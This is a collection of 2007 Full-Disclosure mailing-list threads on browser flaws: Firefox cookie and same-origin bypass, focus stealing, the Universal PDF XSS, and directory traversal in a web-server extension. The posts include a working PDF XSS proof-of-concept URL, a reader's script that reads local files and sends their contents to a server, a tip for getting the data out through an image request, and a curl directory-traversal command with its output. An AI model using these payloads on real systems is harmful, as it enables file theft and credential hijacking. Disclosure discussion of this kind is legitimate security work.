I have no idea. I have tested it on 2.0.0.1. On 2/23/07, Michael Silk [EMAIL PROTECTED] wrote: On 2/23/07, pdp (architect) [EMAIL PROTECTED] wrote: http://www.gnucitizen.org/projects/hscan-redux/ doesn't work, win 2k3, ff 1.5.0.9 -- mike -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
This vulnerability is cute but not very useful mainly because a lot of social engineering is required. However, here is an interesting thought for you: instead of asking the user into bookmarking a page you can supply the bookmark directly to their browser by using Live Bookmarks. So, a mainstream attack will be when a SPLOG network injects malicious links into their feeds. If someone happens to be subscribed to this network with a Live Bookmark and they click on it... well you know. I haven't tested this, although it should work. So, although I would rate this issue as low risk, it could as well be quite high or at least medium. cheers On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Thu, 22 Feb 2007, pdp (architect) wrote: michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. Bookmarklets should be bookmarkable only manually, with user knowledge and consent (that is, you need to copy-and-paste the URL, etc). This seems to be the case for javascript: URLs. Here, the situation is different: the user can, and quite likely will, unknowingly bookmark a script while attempting to bookmark a regular page via Ctrl-D + return. He doesn't expect or want this code to later run in the context of his start page or any other resource (principle of least astonishment, etc, etc). Cheers, /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. of course it is a security problem if you execute untrusted bookmarklet on a page :). On 2/21/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 /mz http://lcamtuf.coredump.cx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability
: - script src=file:///C:/test.js/script - Exploitation method: - Creates a web page or an HTML Mail with the vulnerable code - When the victim opens the mail or visit the vulnerable site it is possible to accesses his local files. Demonstration: Note: Demonstration will try to accesses few default images and wave files - Visit the POC - If vulnerable internet explorer is used it will show your local sample images and give a proper alert. Solution: No solution Screenshot: http://www.xdisclose.com/images/xdiscloselocalie.jpg Proof Of Concept: http://www.xdisclose.com/poc/xdiscloselocalie.html Impact: A Remote user can get accesses to victims local system files. Scope of impact is limited to system level. Original Advisory: http://www.xdisclose.com/XD100099.txt Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your testing environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox3 offline support speculations
http://www.gnucitizen.org/blog/firefox-offline This post is probably totally useless and most likely waste of your time and my time but it brings some points that you may find intriguing. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
very good work I wander whether we can execute code on about:config or about:cache. Right now we can only modify cookies and bypass the same origin policy. If we can get JavaScript running on about:cache or about:config or some chrome URL, we might be able to completely hijack the browser. If that is possible, the severity level of this issue is more then HIGH. On 2/14/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is a serious vulnerability in Mozilla Firefox, tested with 2.0.0.1, but quite certainly affecting all recent versions. The problem lies in how Firefox handles writes to the 'location.hostname' DOM property. It is possible for a script to set it to values that would not otherwise be accepted as a hostname when parsing a regular URL - including a string containing \x00. Doing this prompts a peculiar behavior: internally, DOM string variables are not NUL-terminated, and as such, most of checks will consider 'evil.com\x00foo.example.com' to be a part of *.example.com domain. The DNS resolver, however, and much of the remaining browser code, operates on ASCIZ strings native to C/C++ instead, treating the aforementioned example as 'evil.com'. This makes it possible for evil.com to modify location.hostname as described above, and have the resulting HTTP request still sent to evil.com. Once the new page is loaded, the attacker will be able to set cookies for *.example.com; he'll be also able to alter document.domain accordingly, in order to bypass the same-origin policy for XMLHttpRequest and cross-frame / cross-window data access. A quick demonstration is available here: http://lcamtuf.dione.cc/ffhostname.html If you want to confirm a successful exploitation, check Tools - Options - Privacy - Show Cookies... for coredump.cx after the test; for the demo to succeed, the browser needs to have Javascript enabled, and must accept session cookies. The impact is quite severe: malicious sites can manipulate authentication cookies for third-party webpages, and, by the virtue of bypassing same-origin policy, can possibly tamper with the way these sites are displayed or how they work. Regards, /mz http://lcamtuf.coredump.cx/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
the first one runs in about:blank which is restricted. the second one is very interesting but still not very useful because it acts like about:blank. hmmm it seams that the hostname field has been seriously overlooked. On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Thu, 15 Feb 2007, pdp (architect) wrote: I wander whether we can execute code on about:config or about:cache. Actually, there are several odd problems related to location updates and location.hostname specifically, including one scenario that apparently makes the script run with document.location in about: namespace. I did not research them any further, so I can't say if they're exploitable - but you can see a demo here, feel free to poke around: http://lcamtuf.coredump.cx/fftests.html Cheers, /mz http://lcamtuf.coredump.cx/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
weird, firefox slowly dies out t2.html html body iframe src=t1.html/iframe /body /html t1.html html body scriptlocation.hostname=blog.com;/script /body /html On 2/15/07, pdp (architect) [EMAIL PROTECTED] wrote: the first one runs in about:blank which is restricted. the second one is very interesting but still not very useful because it acts like about:blank. hmmm it seams that the hostname field has been seriously overlooked. On 2/15/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Thu, 15 Feb 2007, pdp (architect) wrote: I wander whether we can execute code on about:config or about:cache. Actually, there are several odd problems related to location updates and location.hostname specifically, including one scenario that apparently makes the script run with document.location in about: namespace. I did not research them any further, so I can't say if they're exploitable - but you can see a demo here, feel free to poke around: http://lcamtuf.coredump.cx/fftests.html Cheers, /mz http://lcamtuf.coredump.cx/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
explanation of how the attack works here: http://www.gnucitizen.org/blog/browser-focus-rip On 2/12/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Mon, 12 Feb 2007, [ISO-8859-1] Claus Färber wrote: A proper solution would be to keep a list of files explicitly selected by the user and only allow uploads of files in this list. Then even if a script can manipulate the field, the browser won't upload files that have not been selected by the user. Not necessarily that easy: notice that it is the user who enters the name of a target file. Unless you want to prevent the browser from accepting any files that were not chosen using a visual file selector widget - but in such a case, there's not much point in having a manual file path entry box in the first place. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
what's up Michal, IE is vulnerable too, since I used to play around with this bug long time ago. It is a variation of your exploit but the principles are the same. I don't remember where I've read about it... hmm I guess securityfocus.com... very nice demo. On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting logic flaw in Mozilla Firefox web browser. The vulnerability allows the attacker to silently redirect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown / onKeyPress events are handled, allowing the focus to be moved between the two. If exploited, this enables the attacker to read arbitrary files on victim's system. This was tested with 2.0.0.1. Opera is most likely not vulnerable; Microsoft Internet Explorer is not vulnerable as-is, but might be vulnerable to a variant of the attack. All INPUT TYPE=FILE form fields enjoy the benefits of added protection to prvent scripts from arbitrarily choosing local files to be uploaded to the server, and automatically submitting the form. For example, .value parameter cannot be set or changed, and any changes to .type reset the contents of the field. Unfortunately, Firefox allows a malicious script to redirect carefully selected, individual user keystrokes to a hidden file upload field, in order to compose a particular filename, then submit the form. User interaction is required, limiting the impact somewhat - but any website where the user can be reasonably expected to enter some text (a keyboard-controlled web game, a blog posting or commenting interface) can attempt to exploit the vulnerability, and eventually succeed with one user or another. A quick and naive demonstration of the problem (Firefox on Windows is required; depends on scancode values, so not all keyboards may be supported): http://lcamtuf.coredump.cx/focusbug/ (Ta-dah again) /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
try this input id=foo type=text/ script setInterval(function () { document.getElementById('foo').focus(); },1); /script :) the address bar is disabled... On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote: phh :), I found something very interesting when testing your IE example... every time I try to type something in the address bar, the focus is redirected back to the input box. I wonder if it is possible to capture what the user is typing in the address bar. That would be neat... I am just checking your code to see what the hell is going on. On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sun, 11 Feb 2007, pdp (architect) wrote: IE is vulnerable too, since I used to play around with this bug long time ago. Possibly MS00-093, but that's long fixed. But yes, MSIE variant is possible, though more contrived. /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
here is an idea... we can combine both techniques into a single attack... the hardest part of your hack is to force the user to type :// plus several other / but if we steel the focus from the address bar, unaware users will type something like this http://www.google.com for example, which is what we want. On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote: try this input id=foo type=text/ script setInterval(function () { document.getElementById('foo').focus(); },1); /script :) the address bar is disabled... On 2/11/07, pdp (architect) [EMAIL PROTECTED] wrote: phh :), I found something very interesting when testing your IE example... every time I try to type something in the address bar, the focus is redirected back to the input box. I wonder if it is possible to capture what the user is typing in the address bar. That would be neat... I am just checking your code to see what the hell is going on. On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sun, 11 Feb 2007, pdp (architect) wrote: IE is vulnerable too, since I used to play around with this bug long time ago. Possibly MS00-093, but that's long fixed. But yes, MSIE variant is possible, though more contrived. /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
Well, :) I cannot see how you can force someone to type / at least twice. Even if the targeted user writes a blog entry it is very unlikely that he/she will use / . I guess this vector works well on wikies and other systems that allow you to specify the text format through meta-characters. The cool think about stealing the address bar focus is that a confused user will try to repeat typing the url again and that may give you enough slashes and other characters to steal /etc/shadow or /etc/passwd for example, which means that this attack vector can work virtually every where. For example: Joe visits eveil.com. He is not interested in the site but evil.com is interested in his files. Joe types http://[what ever]. evil.com hijacks the address bar focus. This is how they get the first /. Joe will probably repeat to type stuff in the address bar again. The rest of the characters are not obtained. Now of course Joe will realise that he is not typing in the address bar but he will probably think that either the browser is screwed up or that he forgot to select the address bar first (it happens all the time). So, this is why I think that combination of both issues can create one hell of a good attack. Here is another idea. Joe visits Betty's MySpace private page. The page contains XSS. On the page there is an input box and a captcha. The user is asked to enter the text in the captcha in order to access the page. The captcha is: pde/t/aswsc Joe enters the text but the he receives a complain that his input is incorrect. The attacker repeats the process until all required characters are entered into the FILE INPUT box. simple. On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sun, 11 Feb 2007, pdp (architect) wrote: here is an idea... we can combine both techniques into a single attack... the hardest part of your hack is to force the user to type :// plus several other / Actually, MSIE doesn't require drive specification in the filename, and will probably accept relative paths as well (so you might not need \ either when picking files from the desktop or 'my documents' or whatnot). Firefox won't settle for a path without drive specification (but it will accept SMB requests ;-). On *nix systems, of course, aiming /etc/passwd is easier than C:\whatever. The problem with intercepting address bar input is that you can't echo the entered text back there without unloading the current document and its scripts; in my examples, I tried to make sure that it's hard for the user to notice that his input is not going where it should (in MSIE example, this includes simulation of a blinking cursor). /mz -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)
this is a design problem that is not easy to fix. On 2/11/07, Michal Zalewski [EMAIL PROTECTED] wrote: On Sun, 11 Feb 2007, Michal Zalewski wrote: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html Oh, and Secunia doesn't credit the Firefox variant to Charles, either: NOTE: A variant of this vulnerability was reported in a Mozilla Bugzilla bug entry back in year 2000. Holy crud! /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
hei man, this is not a news :) On 2/9/07, Stefano Di Paola [EMAIL PROTECTED] wrote: Plain Old Web Server Good Old Dir Traversal curl 127.0.0.1:6670/../../../../ -kivvv * About to connect() to 127.0.0.1 port 6670 * Trying 127.0.0.1... connected * Connected to 127.0.0.1 (127.0.0.1) port 6670 GET /../../../../ HTTP/1.1 User-Agent: HackTheHacker(tm) Host: 127.0.0.1:6670 Accept: */* HTTP/1.1 200 OK HTTP/1.1 200 OK Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; Content-Type: text/html Content-Type: text/html pow_server: POW/0.0.7 pow_server: POW/0.0.7 Content-Location: /../../../../ Content-Location: /../../../../ Content-Length: 280 Content-Length: 280 brbrbrbr a href='/../../../../firefox/'firefox//abr a href='/../../../../bookmarks.html'bookmarks.html/abr a href='/../../../../appreg'appreg/abr a href='/../../../../default/'default//abr a href='/../../../../pluginreg.dat'pluginreg.dat/abr * Connection #0 to host 127.0.0.1 left intact * Closing connection #0 A new motto is on the way: HackTheHacker (ascii (tm)) :) Cheers, Stefano Il giorno ven, 09/02/2007 alle 16.23 +, pdp (architect) ha scritto: http://www.gnucitizen.org/blog/plain-old-webserver Must have Firefox Extension that allows you to do all sorts of crazy stuff. https://addons.mozilla.org/firefox/3002/ -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Web: www.wisec.it .. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Machine is Us/ing Us
http://www.gnucitizen.org/blog/the-machine-is-using-us Interesting video that shows some of the reasons why the web has become so dangerous -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Plain Old Webserver - The coolest firefox extension
http://www.gnucitizen.org/blog/plain-old-webserver Must have Firefox Extension that allows you to do all sorts of crazy stuff. https://addons.mozilla.org/firefox/3002/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Useful technique when performing XSS
http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Amit, :) This is not about who did it first. BTW, your example is broken. location.search does not include the fragment identifier. Cheers On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Hei Amit, On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: Amit, :) This is not about who did it first. Agreed. But it would be nice to receive the credit ;-) Sorry man. I knew that you have discussed this before I would definitely give you the credits. :) BTW, your example is broken. location.search does not include the fragment identifier. Guilty as charged. I remember working directly with document.location (which includes the hostname and path) when I investigated the issue, then when I wrote my text I decided that a more elegant way would be with the .search property, but I failed to verify that it actually works. Thanks for pointing this out, and here's the formal errata: In http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, the example should be: http://target.site/vulnscript.cgi?injectme= http://target.site/vulnscript.cgi?injectme=scripteval(document.location.substr(...[fill in the offset here]...))/script#...JS payload here... Thanks to pdp (architect) for pointing this out. Regardns, -Amit Cheers On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Technika - Attack Scripting Environment
http://www.gnucitizen.org/projects/technika/ Technika was developed for the computer security professionals to automate common exploitative task from the browser. It acts like a standard OS shell scripting environment. You can script everything from the currently viewed page and also spawn processes, unrestricted XMLHttpRequest connections and Sockets. Technika was successfuly used to implement several Web and System related exploits that run directly from the browser. Unfortunatley their source code cannot be shown here for obvious reasons. The extension is still in Alpha although it is mostly usable and quite stable. If you have a proposal, question, suggestion or correction, please contact us. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] What happens to Your Computer if you Mispell Google.com
http://www.gnucitizen.org/blog/what-happens-to-your-computer-if-you-mispell-googlecom it is worth seeing this -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Atom Database
The purpose of this database is to collect and discuss useful attack snippets (atoms) which can be employed when performing WEB Application Security testing. http://www.gnucitizen.org/topics/atom-database -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Persistent Web Backdoor
It is simple, It is lame, Yet very interesting. This kind of stuff rise a lot of questions. http://www.gnucitizen.org/projects/greasecarnaval -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Universal PDF XSS After Party
Everybody knows about it. Everybody talks about it. We had a nice party. It is time for estimating the damages. In this article I will try to show the impact of the Universal PDF XSS vulnerability by explaining how it can be used in real life situations. http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images. var img = new Image() img.src = url; this should work. On 1/4/07, T Biehn [EMAIL PROTECTED] wrote: I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability: Here's the code I have so far, based more or less on PDP's Vanilla, almost' PDP's (different url, spaces removed etc.) file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); What I'm trying to do: file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', ' file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null); Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context. Try putting this is IE: file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol') ; and then try it in FireFox It won't work in IE 6, but it executes just fine in FireFox. function cXHR(){ //Grabs a legit XHR. try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new XMLHttpRequest(); }catch(e){} return null; } var xhr = cXHR(); //For grabbing var xhr2 = cXHR(); //For sending xhr.onreadystatechange = function(){ if (xhr.readyState == 4){ alert(xhr.responseText); xhr2.open('GET', ' http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo. xhr2.onreadystatechage = function(){ alert('File Transferred!'); }; xhr2.send (null); } }; xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true); xhr.send(null); Anyone's input on this matter would be appreciated. On 1/4/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote: Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8. - Juha-Matti Larry Seltzer [EMAIL PROTECTED] wrote: According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0. I've actually tested it. On Reader 8 Acrobat you get a messagebox that says This operation is not allowed Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Universal XSS with PDF files: highly dangerous
I will be very quick and just point to links where you can read about this issue. It seams that PDF documents can execute JavaScript code for no apparent reason by using the following template: http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here You must understand that the attacker doesn't need to have write access to the specified PDF document. In order to get an XSS vector working you need to have a PDF file hosted on the target and that's all about it. The rest is just a matter of your abilities and desires. This finding was originally mentioned by Sven Vetsch, on his blog. This is a very good and quite interesting. Good work. There is a POC I composed: http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null); More on the matter can be found here: http://www.gnucitizen.org/blog/danger-danger-danger/ http://www.disenchant.ch/blog/hacking-with-browser-plugins/34 -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous
no worries, the vulnerability details presented on my blog post were updated. good work. On 1/3/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Quoting pdp (architect) [EMAIL PROTECTED]: This finding was originally mentioned by Sven Vetsch, on his blog. This is a very good and quite interesting. Good work. Sorry about that but that's wrong. All the credits have to go to Stefano Di Paola and Giorgio Fedon. They presented that stuff at the 23C3 in Berlin. The only thing that I did was an overview and I found out, that it doesn't matter how the parameter is called. I just forgot to copy paste the credits from my original document, to the blog entry. I'm very sorry about that and of course I putted it in my entry now. Regards, Disenchant / Sven Vetsch -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
Explorer: http://site.com/file.pdf#...(More '#') The application is waiting for more inputs and allocates more memory. -- ...oOOo...oOOo Stefano Di Paola Software Security Engineer Web: www.wisec.it .. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] new backframe release
